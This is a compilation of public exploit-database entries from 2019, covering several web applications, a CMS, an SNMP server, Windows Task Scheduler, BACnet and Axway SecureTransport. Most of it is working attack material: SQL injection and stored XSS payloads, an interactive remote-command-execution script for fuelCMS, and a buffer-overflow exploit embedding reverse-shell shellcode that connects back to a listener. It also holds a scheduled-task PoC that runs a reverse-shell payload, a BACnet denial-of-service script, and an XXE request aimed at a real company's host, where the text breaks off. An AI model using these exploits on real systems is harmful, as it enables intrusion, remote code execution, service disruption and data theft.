# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html
# Demo Site: http://demobul.net/firma-rehberi-v1/
# Version: v1
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request:
http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni
Vulnerable Parameters: il,kelime,kat (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
# Demo Site: http://demobul.net/rentacarv3/
# Version: v3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: kategori[] (GET)
Payload: if(now()=sysdate(),sleep(0),0)

----- PoC 2: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: klima[] (GET)
Payload: 1 AND 3*2*1=6 AND 695=695

----- PoC 3: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 4: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 5: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: yakit[] (GET)
Payload: 1 AND 3*2*1=6 AND 602=602

# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
# Demo Site: http://demobul.net/firmav13/
# Version: v13
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----
Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
Vulnerable Parameters: oz[] (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting
# Date: 2019-07-19
# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
# Tested on: 9.1.0
# CVE: CVE-2019-13029
# Security advisory: https://gitlab.com/snippets/1874216

### Stored XSS n°1 – Project name (found by Dylan GARNAUD)

Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.

- Where? In project name
- Payload: `<BODY onKeyPress=alert("xss")>`
- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages.
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified

### Stored XSS n°2 – Calendar (found by Dylan GARNAUD)

- Where? Calendar event
- Payload: `<BODY onKeyPress=alert("xss")>`
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12

### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD)

- Where? Wherever there is a CSV upload feature with displayed parsed results
- Payload:
  ```csv
  record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete
<script>alert("upload xss")</script>,,
  ```
- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered.
- Privileges: It requires admin privileges to store it.
- URL examples of execution:
  + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index
  + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16

### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI)

- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue)
- Payload: `</textarea><svg/onload='alert("XSS survey queue")'>`
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16

### Stored XSS n°5 – Survey (found by Alexandre ZANNI)

- Where? In the survey management system.
  + Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*).
  + Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS.
- Payload:
  ```html
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert('Survey XSS')</SCRIPT>"></BODY></HTML>
  ```
- Privileges:
  + Store: It requires admin privileges to store it.
  + Execute: Any unauthenticated user that can consult a survey.

# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html
# Demo Site: http://demobul.net/eticaretv5/
# Version: v5
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/arama?kategori=&q=
Vulnerable Parameter: q (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/ajax/productsFilterSearch
Vulnerable Parameter: q (POST)
Payload:
kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1

# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
# Demo Site: http://demobul.net/emlakv2/
# Version: v2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/ara.html?ara=
Vulnerable Parameter: ara (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html
# Demo Site: http://demobul.net/emlakv3/
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: emlak_durumu (GET)
Payload: -1' OR 3*2*1=6 AND 000744=000744 --

----- PoC 2: SQLi -----

Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: emlak_tipi (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

----- PoC 3: SQLi -----

Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: il (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

----- PoC 4: SQLi -----

Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: ilce (GET)
Payload: -1' OR 3*2*1=6 AND 000397=000397 --

----- PoC 5: SQLi -----

Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: kelime (GET)
Payload: -1' OR 3*2*1=6 AND 000397=000397 --

----- PoC 6: SQLi -----

Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: semt (GET)
Payload: -1' OR 3*2*1=6 AND 000531=000531 --

# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html
# Demo Site: http://demobul.net/eticaretv3/
# Version: v3
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/ara.html?a=
Vulnerable Parameter: a (GET)
Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf%

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
  xxxx = raw_input('cmd:')
  burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
  proxy = {"http":"http://127.0.0.1:8080"}
  r = requests.get(burp0_url, proxies=proxy)

  html = "<!DOCTYPE html>"
  htmlcharset = r.text.find(html)

  begin = r.text[0:20]
  dup = find_nth_overlapping(r.text,begin,2)

  print r.text[0:dup]

# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)  


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



def pattern_create(_type,_length):
  _type = _type.split("")

  if _type[0] == "trash":
    return _type[1] * _length
  elif _type[0] == "random":
    return ''.join(random.choice(string.lowercase) for i in range(_length))
  elif _type[0] == "pattern":
    _pattern = ''
    _parts = ['A', 'a', '0']
    while len(_pattern) != _length:
      _pattern += _parts[len(_pattern) % 3]
      if len(_pattern) % 3 == 0:
        _parts[2] = chr(ord(_parts[2]) + 1)
        if _parts[2] > '9':
          _parts[2] = '0'
          _parts[1] = chr(ord(_parts[1]) + 1)
          if _parts[1] > 'z':
            _parts[1] = 'a'
            _parts[0] = chr(ord(_parts[0]) + 1)
            if _parts[0] > 'Z':
              _parts[0] = 'A'
    return _pattern
  else:
    return "Not Found"

def pwned(_host, _port, _payload):
  print "[*] Conectandose a {0}:{1}...".format(_host, _port)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((_host, _port))
  print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
  _payload = "{0}\r\n\r\n".format(_payload)
  s.send(_payload)
  _data = s.recv(1024)
  s.shutdown
  s.close
  print 'Recibido:', repr(_data)
  print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))


def main():

  _host = "192.168.0.12"
  _port = 987
  _offset_eip = 642200
  _padding = 642144
  _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
  _tag = "w00tw00t"

  #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
  _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
"\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
"\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
"\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
"\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
"\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
"\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
"\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
"\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
"\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
"\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
"\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
"\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
"\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
"\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
"\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
"\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
"\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
"\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
"\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
"\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
"\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
"\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
"\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
"\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
"\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
"\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
"\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
"\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
"\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
"\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
"\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
"\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
"\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
"\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
"\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
"\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
"\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
"\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
"\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
"\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
"\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
"\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
"\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
"\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
"\x70\x73\x63\x69\x6f\x59\x45\x41\x41")

  _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

  _inject =  pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
  _inject += _tag
  _inject += _shellcode
  _inject += _egghunter
  _inject +=  pattern_create("trash B", _offset_eip-len(_inject))
  _inject += _eip

  print(_inject)
  pwned(_host,_port,_inject)

if __name__ == "__main__":
    main()

Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)


Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.


Summary: - The Typical Computer User Can Trigger Programs at Intervals on any Account existing on the Host System/Domain without Propper Authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI, MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group including administrator accounts.
                : - Only the GUI seems to be affected, this is shown with our simple PowerShell script when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp' additional permissions are required.
                : - Whereas the GUI allows "-AtLogOn" without additional permissions.
                : - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload, therefore exploitability is greatly increased.
                : - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and simply log the event instead, increasing the chances of a system administrator looking past the issue.
                : - Enterprise/Personal systems complying with basic security practices are less likely to be affected, the average computer user with default system configuration could be vulnerable to such attacks.


Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload, its up to you "the attacker" to create your own payload.
#
#NOTE: Task should run everyday at 9pm (system time). You can change this to what suits your needs.
#      Task will only have 'user' permissions, this PoC only exists to prove modifying line 9, col 39 & line 3, col 28 to either "AtLogIn" or "AtStartUp" will result in access denied.
#      The GUI is automatically elevated, whereas the CLI is not.
#   ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
     : - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.


Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery         5th July 2019
        : - Initial Report    5th July 2019
        : - Case Opened       8th July 2019
        : - Added Detail      8th July 2019    *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
        : - MSRC Response     9th July 2019
        : - Our Response      9th July 2019
        : - Case Closed       9th July 2019
        : - MSRC Response     9th July 2019
        : - Our Response      9th July 2019    *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)   

        : - We thank the MSRC team for their quick response.

# Exploit Title: BACnet Stack 0.8.6 - Denial of Service
# Google Dork: [if applicable]
# Date: 2019-07-19
# Exploit Author: mmorillo
# Vendor Homepage: https://sourceforge.net/p/bacnet/
# Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/
# Version: bacnet-stack-0.8.6
# Tested on: Linux
# CVE: CVE-2019-12480

#!/usr/bin/env python
# 
# After reported the bug to the vendor, sharing details
# about the vulnerability, as well as proof-of-concept code (exploit code to 
# test), has been release a fix for 0.8.7 release of 
# BACnet Protocol Stack https://sourceforge.net/p/bacnet/

import socket
import struct
import argparse
import os
import sys
from termcolor import colored

#------------------------------------------------------------------------------
# Command line parser using argparse
#------------------------------------------------------------------------------

def cmdline_parser():
    parser = argparse.ArgumentParser(conflict_handler='resolve', add_help=True,
             description='BACnet Protocol Stack Segmentation fault leading to denial of service', version='0.1',
             usage="python %(prog)s")

    # Mandatory
    parser.add_argument('Server', type=str, help='BACnet server IP')
    parser.add_argument('Port', type=str, help='BACnet port')

    return parser


def get_Host_name_IP(): 
    try: 
        host_name = socket.gethostname() 
        host_ip = socket.gethostbyname(host_name) 
        return host_ip
    except: 
        print("Unable to get Hostname and IP") 


def target_alive(BACnetServer, BACnetPort):
    response = os.system("nc -u -z -w 1 " + BACnetServer + "" + str(BACnetPort))

    if response == 0:
        return True
    else:
        return False

#------------------------------------------------------------------------------
# Main of program
#------------------------------------------------------------------------------

def main():

    # Get the command line parser.
    parser = cmdline_parser()

    # Show help if no args
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    # Get results line parser.
    results = parser.parse_args()

    BACnetServer = results.Server
    BACnetPort = int(results.Port)
    SRC_IP = get_Host_name_IP()

    if not target_alive(BACnetServer, BACnetPort):
        print((colored("[+] BACnet server down", "yellow")))

    else:
        if target_alive(BACnetServer, BACnetPort):

            payload_DeviceCommunicationControl = "\x81\x0a\x00\x16\x01\x04\x00\x05\x01\x11\x0d\xff\x80\x00\x03\x1a\x0a\x19\x00\x2a\x00\x41"

            print((colored("[+] Sending BACnet DeviceCommunicationControl payload from " + SRC_IP, "green")))

            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
            s.connect((BACnetServer, BACnetPort))
            s.send(struct.pack('>I',len(payload_DeviceCommunicationControl)))
            s.send(payload_DeviceCommunicationControl)

            print((colored("[+] Sent Payload: " + payload_DeviceCommunicationControl.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))

        if target_alive(BACnetServer, BACnetPort):

            payload_AtomicReadFile = "\x81\x0a\x00\x1b\x01\x14\x00\x05\x01\x06\xc4\x02\x80\x00\x00\x0e\x35\xff\xdf\x62\xee\x00\x00\x22\x05\x84\x0f"

            print((colored("[+] Sending BACnet AtomicReadFile payload from " + SRC_IP, "green")))

            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
            s.connect((BACnetServer, BACnetPort))
            s.send(struct.pack('>I',len(payload_AtomicReadFile)))
            s.send(payload_AtomicReadFile)

            print((colored("[+] Sent Payload: " + payload_AtomicReadFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))

        if target_alive(BACnetServer, BACnetPort):

            payload_AtomicWriteFile = "\x81\x0a\x00\x1b\x01\x04\x00\x05\x02\x07\xc4\x02\x80\x00\x00\x0e\x35\xff\x5e\xd5\xc0\x85\x0a\x62\x64\x0a\x0f"

            print((colored("[+] Sending BACnet AtomicWriteFile payload from " + SRC_IP, "green")))

            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
            s.connect((BACnetServer, BACnetPort))
            s.send(struct.pack('>I',len(payload_AtomicWriteFile)))
            s.send(payload_AtomicWriteFile)

            print((colored("[+] Sent Payload: " + payload_AtomicWriteFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))

        if not target_alive(BACnetServer, BACnetPort):
            print((colored("[+] DoS completed", "red")))


#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------

if __name__ == '__main__':
    main()

# Exploit Title: NoviSmart CMS SQL injection
# Date: 23.7.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.novismart.com/
# Version: Every version
# CVE : CWE-89

Vulnerable parameter: Referer (HTTP Header field)

[GET Request]

GET / HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

                             _       _ 
          _______ _ __ ___  | | ___ | |
         |_  / _ \ '__/ _ \ | |/ _ \| |
          / /  __/ | | (_) || | (_) | |
         /___\___|_|  \___(_)_|\___/|_|
                https://zero.lol
                 zero days 4 days


        ATTENTION:

        this is a friendly neighborhood zeroday drop


Title: Axway SecureTransport 5 Unauthenticated XML Injection / XXE
Google Dork: intitle:"Axway SecureTransport""Login"
Date: July 20th 2019
Author: Dominik Penner / zer0pwn of Underdog Security
Vendor Homepage: https://www.axway.com/en
Software Link:
https://docs.axway.com/bundle/SecureTransport_54_AdministratorGuide_allOS_en_HTML5/page/Content/AdministratorsGuide/overview/overview.htm
Version: 5.x

"Axway SecureTransport is a multi-protocol MFT gateway for securing, managing, and tracking file flows among people and applications inside your enterprise, and beyond your firewall to your user communities, the cloud and mobile devices. It is designed to handle everything — from high-volume automated high speed secure file transfers between systems, sites, lines of business and external partners, to user-driven communications and mobile, folder- and portal-based file sharing."

Who uses this software?

Well, to name a few... (just use the dork dude)
- Government of California
- Biometrics.mil
- Fleetcor
- Costco
- Boeing
- IRS


Description:
Axway SecureTransport versions 5.3 through 5.0 (and potentially others) are vulnerable to an unauthenticated blind XML injection (& XXE) vulnerability in the resetPassword functionality via the REST API. If executed properly, this vulnerablity can lead to local file disclosure, DOS or URI invocation attacks (e.g SSRF->RCE). It's worth noting that in version 5.4 the v1 API was deprecated... but not removed entirely. Meaning that you can still trigger this vulnerability on updated installations if they have the v1.0, v1.1, v1.2 or v1.3 in the /api/ directory.


Reproduction:

1. Breaking the parser.

  HTTP Request:
  ```
  POST /api/v1.0/myself/resetPassword HTTP/1.1
  Host: securefile.costco.com
